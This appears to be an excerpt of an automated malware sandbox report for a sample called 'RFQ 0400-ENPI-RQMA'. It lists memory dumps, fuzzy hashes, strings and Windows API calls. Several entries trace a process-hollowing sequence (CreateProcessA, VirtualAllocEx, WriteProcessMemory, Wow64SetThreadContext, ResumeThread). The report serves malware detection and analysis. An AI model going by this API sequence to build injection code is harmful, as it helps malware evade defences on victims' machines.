                                                                                      • Instruction ID: 16941e082cbf2f374dd71324eb5ce6a776f016dfb662138457131d1894af67a2
                                                                                      • Opcode Fuzzy Hash: 2ef4494be4f8fb130d99b156d2c39bbda818e8a5ae0f5d0a1d0ae9d9c853b16d
                                                                                      • Instruction Fuzzy Hash: ACE1BEB17016058FDB65EBA5C860BBEB7F7EF88700F54446EE1869B290CB35E901CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ff72df61f7214c7bdd82aeecdd8f3950481a803c215d2a0776650928bf711f49
                                                                                      • Instruction ID: ca393a8af53ebd2df7af14b892e7afb4fcfad381b2bd81b01636d32fbb8abd07
                                                                                      • Opcode Fuzzy Hash: ff72df61f7214c7bdd82aeecdd8f3950481a803c215d2a0776650928bf711f49
                                                                                      • Instruction Fuzzy Hash: 0691FAB0D16219EFDB08CFA5D58099EFBF2FB89300F20A456E419BB228D7749946DF14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8a506d4c66663dd08ccf9a17caa7cc9e1fdb6f8ada507386f394763c389227f5
                                                                                      • Instruction ID: 00d477254dd2d446c447e1c03e22a3ec8c79d7baf59b74379f8f10ce4ac41719
                                                                                      • Opcode Fuzzy Hash: 8a506d4c66663dd08ccf9a17caa7cc9e1fdb6f8ada507386f394763c389227f5
                                                                                      • Instruction Fuzzy Hash: CA8125B4E15229DFDB04CFA9C9409EEFBB2FF89210F10959AD905B7224D7349A42CF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 26e88fabeff41b2a73fe8ddb28f73c9e733bbc8929d568a2bb2b007ab05ae936
                                                                                      • Instruction ID: 36600e355e1b767e9031fcb49b91521a9c55a9903e02435018db8a7412149680
                                                                                      • Opcode Fuzzy Hash: 26e88fabeff41b2a73fe8ddb28f73c9e733bbc8929d568a2bb2b007ab05ae936
                                                                                      • Instruction Fuzzy Hash: 4E312DB0D057449FDB59CFA6C8443DABFF2AF86310F14C0AAD444AB265DB750949CF51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 38cbab2bde9a59b12eecd536c5fe670c655ff9fd46cdde375cb0fbbb1e1f4906
                                                                                      • Instruction ID: b871128888032f9a265500262b6853bdef2205b3f9f8be9ee652b6f9371c1b8a
                                                                                      • Opcode Fuzzy Hash: 38cbab2bde9a59b12eecd536c5fe670c655ff9fd46cdde375cb0fbbb1e1f4906
                                                                                      • Instruction Fuzzy Hash: 2521E9B1E016589BEB18CF9BD9446DEFBF3AFC9310F14C16AD409A6268DB740A46CA50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$ fcq$ fcq$Te^q$Te^q$XX^q$XX^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-1437089595
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 016AD1D6
                                                                                      • GetCurrentThread.KERNEL32 ref: 016AD213
                                                                                      • GetCurrentProcess.KERNEL32 ref: 016AD250
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 016AD2A9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 016AD1D6
                                                                                      • GetCurrentThread.KERNEL32 ref: 016AD213
                                                                                      • GetCurrentProcess.KERNEL32 ref: 016AD250
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 016AD2A9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
control_flow_graph at 7d8591b: API calls ResumeThread, Wow64SetThreadContext
                                                                                      APIs
                                                                                      • ResumeThread.KERNELBASE(?), ref: 07D85982
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q$Te^q
                                                                                      • API String ID: 0-3743469327
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3H5$3H5
                                                                                      • API String ID: 0-2752242361
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D86026
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID:
                                                                                      • API String ID: 963392458-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D86026
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID:
                                                                                      • API String ID: 963392458-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 016AB016
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateActCtxA.KERNEL32(?), ref: 016A59C9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateActCtxA.KERNEL32(?), ref: 016A59C9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D85BF8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3559483778-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D85BF8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3559483778-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D85CD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead
                                                                                      • String ID:
                                                                                      • API String ID: 1726664587-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016AD427
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D85CD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead
                                                                                      • String ID:
                                                                                      • API String ID: 1726664587-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D85A4E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: ContextThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 983334009-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016AD427
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D85B16
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016AB491,00000800,00000000,00000000), ref: 016AB682
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016AB491,00000800,00000000,00000000), ref: 016AB682
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D85B16
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ResumeThread.KERNELBASE(?), ref: 07D85982
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 016AB016
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D8801D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost
                                                                                      • String ID:
                                                                                      • API String ID: 410705778-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D8801D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost
                                                                                      • String ID:
                                                                                      • API String ID: 410705778-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: O};5
                                                                                      • API String ID: 0-3558557551
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c3248b1e96dbb8a8c4f277cf5868d848bb9dcaa6c15e791104f9203776179e75
                                                                                      • Instruction ID: a3280979a0fb61170dff6c4aa59d38d5eed8b97fc8d4329df94e79772e081527
                                                                                      • Opcode Fuzzy Hash: c3248b1e96dbb8a8c4f277cf5868d848bb9dcaa6c15e791104f9203776179e75
                                                                                      • Instruction Fuzzy Hash: 112170B4A00908EFD744DF9AE184999BFF2FF8C310F9680D5E8489B265EB319995CB05
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b55b5773672715d049f3c6c8697951d4da4c829261f2673db04230f26def17ab
                                                                                      • Instruction ID: 0865c1ee1830d20ef8f8d6abcb9cf038dad3ec818cef1972496e328204572e3f
                                                                                      • Opcode Fuzzy Hash: b55b5773672715d049f3c6c8697951d4da4c829261f2673db04230f26def17ab
                                                                                      • Instruction Fuzzy Hash: 97110EB5E002164FAB15EF3888441BFBBF6EBC4260B148969D46CE7380EF3099068760
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d10ea0b64e3e17f81fa8b88add76c63eb0585e43df8cf0c908c64b90210f261e
                                                                                      • Instruction ID: a0b967701e39245f11c32f414a2e216a5bf2be5ca76419f2f77be125d8697dd9
                                                                                      • Opcode Fuzzy Hash: d10ea0b64e3e17f81fa8b88add76c63eb0585e43df8cf0c908c64b90210f261e
                                                                                      • Instruction Fuzzy Hash: 5721D6B4E05219DFDB40CFA9C1919BEBBF5EB49300F609199E809A7311D7709A42DF51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a9bb91ec5cdd9c56913aa434cd006c98649337deeaa84265e232ac47e296fc3
                                                                                      • Instruction ID: 0c71197236b234f11a29a02bd2410dc89ce9315bada7fe046c15ebea2673c7b9
                                                                                      • Opcode Fuzzy Hash: 1a9bb91ec5cdd9c56913aa434cd006c98649337deeaa84265e232ac47e296fc3
                                                                                      • Instruction Fuzzy Hash: 662114B59003599FCB10CF9AC884ADFBBF4FB48320F10841AE919A7310D775A945CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657193837.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_164d000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657152649.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_163d000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ed65ccb1283237260778eafb7a97b1683afb456483eb6dfd77603fba20393d05
                                                                                      • Instruction ID: 16dd4682b73a47f6adfef1d4d779403c7c6521fec349d2572da495889aeac06a
                                                                                      • Opcode Fuzzy Hash: ed65ccb1283237260778eafb7a97b1683afb456483eb6dfd77603fba20393d05
                                                                                      • Instruction Fuzzy Hash: F4012B310083849AE7124E69CD84B77BFB8EF81364F48C52AED090A386D339D841C671
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c1960b973cdb1aad733f0455ca0e2eb78e8abde40a499fe24835556a0133f1ad
                                                                                      • Instruction ID: 41f3510ef15a6bebcf6f8e282a45661ae44d870d87a81b2802abda071ee2ad8a
                                                                                      • Opcode Fuzzy Hash: c1960b973cdb1aad733f0455ca0e2eb78e8abde40a499fe24835556a0133f1ad
                                                                                      • Instruction Fuzzy Hash: 4901F2F29053598FDB218FA9D8087CBBFF0EF49314F188089E15867122C639404ADB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3cca30b000a31158741bd5d88f5168ba45d24043b5428d33d6577d9535b41e31
